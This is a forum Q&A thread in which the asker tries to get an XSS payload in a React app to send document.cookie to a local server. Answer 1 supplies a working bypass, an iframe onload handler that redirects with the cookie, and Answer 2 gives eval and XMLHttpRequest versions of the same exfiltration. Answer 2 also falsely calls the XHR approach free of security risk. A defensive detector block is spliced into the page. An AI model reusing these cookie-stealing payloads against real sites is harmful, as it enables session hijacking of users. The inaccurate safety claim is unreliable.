What could be the reason for this XSS script not making a request to my server?

Currently diving into the realm of XSS attacks to enhance my knowledge on application security. My goal is to extract the user's cookie from a local website and then transmit it to my local server for testing purposes.

I've successfully obtained the cookie using an alert message, but encountering difficulties when attempting to execute an API call. Here is the code snippet I suspect may be causing the issue:

Code in React app:

    <p dangerouslySetInnerHTML={{
      __html: `<script type="text/javascript">
               document.location='http://localhost:2021/xss?user='+document.cookie;
               </script>`,
    }}
    />

Server-side code:

    const app = require("express")();
    const cors = require("cors");
    app.use(cors());

    app.get("/xss", (req, res) => {
      const { user } = req.query;
      // res.send() takes a single body argument; reply as plain text
      res.type("text/plain").send(`it works ${user}`);
    });

    app.listen(2021, () =>
      console.log("Server is waiting to read yummy cookies")
    );

The specified route "/xss" does not seem to trigger any action as expected.

Answer №1

Manipulating innerHTML will not trigger script execution.

    document.getElementById("container").innerHTML=`<script>alert("hi")<\/script>Nothing occurs`
    <div id="container"></div>

Consider using this alternative method instead:

    <div dangerouslySetInnerHTML={{
      __html: `<iframe onload="document.location='http://localhost:2021/xss?user='+document.cookie;"></iframe>`,
    }}
    />
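
The distinction Answer №1 draws (a `<script>` tag assigned through innerHTML stays inert, while an inline event handler still runs) can be turned into a review check for strings that reach `dangerouslySetInnerHTML`. This is an added example, not part of the original answers; the names `RULES`, `SAMPLES`, `auditHtmlSink` and `executesViaInnerHTML` are hypothetical, and the sample strings are constructed.

```javascript
// Added example: a review aid for strings headed to innerHTML or
// dangerouslySetInnerHTML. It is a triage check, not a sanitizer.

// Each rule names a construct and how it behaves in an innerHTML sink.
const RULES = [
  { id: "script-tag", re: /<script\b/i,
    note: "inert via innerHTML; runs via document.write or server-rendered HTML" },
  { id: "event-handler", re: /<[a-z][^>]*\son[a-z]+\s*=/i,
    note: "inline handlers run when their event fires (onload, onerror, ...)" },
  { id: "javascript-url", re: /\b(?:href|src|action|formaction)\s*=\s*["']?\s*javascript:/i,
    note: "runs on click or navigation" },
  { id: "srcdoc", re: /<iframe\b[^>]*\ssrcdoc\s*=/i,
    note: "srcdoc is parsed as a new document, so scripts inside it run" },
];

// Constructed sample inputs with benign handler bodies.
const SAMPLES = {
  scriptTag: '<script>alert("hi")</script>Nothing occurs',
  iframeOnload: '<iframe onload="console.log(1)"></iframe>',
  imgOnerror: '<img src="x" onerror="console.log(1)">',
  jsUrl: '<a href="javascript:void(0)">link</a>',
  plain: "<b>hello</b> <i>world</i>",
};

// Returns the ids of every rule the markup matches, in RULES order.
function auditHtmlSink(html) {
  return RULES.filter((rule) => rule.re.test(html)).map((rule) => rule.id);
}

// True when the markup can run code even though <script> itself stays inert.
function executesViaInnerHTML(html) {
  return auditHtmlSink(html).some((id) => id !== "script-tag");
}

// Print one line per sample: name, matched rule ids, executes-in-sink flag.
for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, auditHtmlSink(html), executesViaInnerHTML(html));
}
```

A pattern check like this only flags markup for review; untrusted HTML that must be rendered should go through a parser-based sanitizer such as DOMPurify before it reaches the sink.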

Answer №2

I'm not sure what your goal is, but creating a script tag like that is not the best solution. The issue here is that the JavaScript code isn't being executed because it's being treated as plain text within the script tag. If you want to execute JavaScript from a string, you could use the eval function (although I would advise against it due to security risks). Here's an example of how you could do this:

    const script = `document.location='http://localhost:2021/xss?user='+document.cookie;`;
    eval(script);

However, I must emphasize again: do not do this!!!

Instead, consider serving the JavaScript file from a server and using the src attribute to load it.

If you simply need to make an HTTP request, you can use XHR. More information on this topic can be found here. In short:

    const xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://localhost:2021/xss?user=' + document.cookie);
    xhr.send();

This approach should work without introducing any security risks.
